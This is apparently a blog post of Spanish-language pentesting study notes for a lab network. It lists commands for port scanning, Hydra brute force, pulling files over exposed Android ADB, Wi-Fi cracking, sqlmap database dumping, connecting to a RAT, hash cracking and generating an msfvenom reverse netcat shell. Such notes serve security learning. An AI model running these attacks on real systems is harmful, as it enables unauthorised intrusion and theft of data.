Mys notes and chetsheets markdwon
# Cheatsheet de Comandos :)
## Escaneo de Red
1. **Escanear puertos comunes en una subred:**
```bash
nmap -p 22,23,80,3389 192.168.10.0/24
```
2. **Escaneo completo de puertos:**
```bash
nmap -p- 192.168.10.0/24
```
3. **Escaneo específico para SMB:**
```bash
nmap -p 139,445 --open -sV 192.168.10.0/24
```
4. **Escaneo de puertos específicos para servicios sospechosos:**
```bash
nmap -p 9871,6703 192.168.10.0/24
```
## Ataques con Hydra
1. **Fuerza bruta para Telnet:**
```bash
hydra -L user.txt -P pass.txt 192.168.10.0 telnet
```
2. **Fuerza bruta para SSH:**
```bash
hydra -L user.txt -P pass.txt 192.168.10.0 ssh
```
3. **Fuerza bruta para SMB:**
```bash
hydra -L user.txt -P pass.txt 192.168.10.0 smb
```
## ADB para Android
1. **Buscar dispositivos en la red:**
```bash
sudo nmap -p 5555 192.168.10.0/24
```
2. **Conectar a un dispositivo Android:**
```bash
adb connect 192.168.10.X:5555
```
3. **Buscar archivos en el dispositivo:**
```bash
adb shell
find /sdcard/ -name "*.jpg" -o -name "*.png"
```
4. **Descargar archivos al sistema local:**
```bash
adb pull /sdcard/scan/ ./DaniuxOut/
```
## Wireshark y Capturas de Red
1. **Filtrar mensajes MQTT Publish:**
```plaintext
mqtt.msgtype == 3
```
2. **Filtrar paquetes dirigidos a una IP específica:**
```plaintext
ip.dst == 192.168.10.10
```
3. **Analizar conversaciones IPv4:**
- **Wireshark:**
`Statistics > Conversations > IPv4 tab`
## Aircrack-ng
1. **Listar redes inalámbricas desde una captura:**
```bash
airodump-ng DaniuxOut.cap
```
2. **Fuerza bruta de contraseña Wi-Fi con Aircrack-ng:**
```bash
aircrack-ng -b 6c:24:a6:3e:01:59 -w '/path/to/wifipass.txt' '/path/to/DaniuxOut.cap'
```
## SQLMap
1. **SQL Injection con archivo de parámetros interceptados:**
```bash
sqlmap -r DaniuxOut.txt --dbs
sqlmap -r DaniuxOut.txt -D database_name --tables
sqlmap -r DaniuxOut.txt -D database_name -T table_name --columns
sqlmap -r DaniuxOut.txt -D database_name -T table_name -C column_name --dump
```
2. **SQL Injection con crawling:**
```bash
sqlmap -u "http://192.168.10.0" --crawl=3 --level=5 --risk=3
```
## RAT
1. **Buscar y conectarse a un puerto RAT:**
- **Escaneo inicial:**
```bash
nmap -p 9871,6703 192.168.10.0/24
```
- **Cliente RAT (interfaz gráfica):**
```plaintext
Ejecutar cliente RAT, ingresar IP y conectar.
```
2. **Buscar archivos usando CMD en el cliente RAT:**
```cmd
dir /b/s "archivo*"
```
## VeraCrypt
1. **Montar un volumen cifrado:**
- Abre VeraCrypt y selecciona el archivo:
```plaintext
C:\Secret
```
- Ingresa la contraseña descifrada.
2. **Buscar archivo dentro del volumen montado:**
```bash
find / -name Confidential.txt
```
3. **Leer contenido del archivo:**
```bash
cat /ruta/Confidential.txt
```
## Crackeo de Hashes
1. **Identificar tipo de hash:**
```bash
hash-identifier
```
2. **Crackear hash con Hashcat:**
```bash
hashcat -m 0 DaniuxOut.txt /path/to/wordlist.txt
```
3. **Opcional: Uso de servicios en línea:**
- [https://hashes.com/en/decrypt/hash](https://hashes.com/en/decrypt/hash)
## Herramientas Adicionales
1. **Steghide para extraer datos ocultos:**
```bash
steghide extract -sf DaniuxOut.jpg
```
2. **Buscar archivos ELF con alta entropía:**
```bash
ent archivo.elf
```
3. **Generar shell reversa con Metasploit:**
```bash
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.10.1 LPORT=4444 -f raw > DaniuxOut.sh
```
Comentarios
Publicar un comentario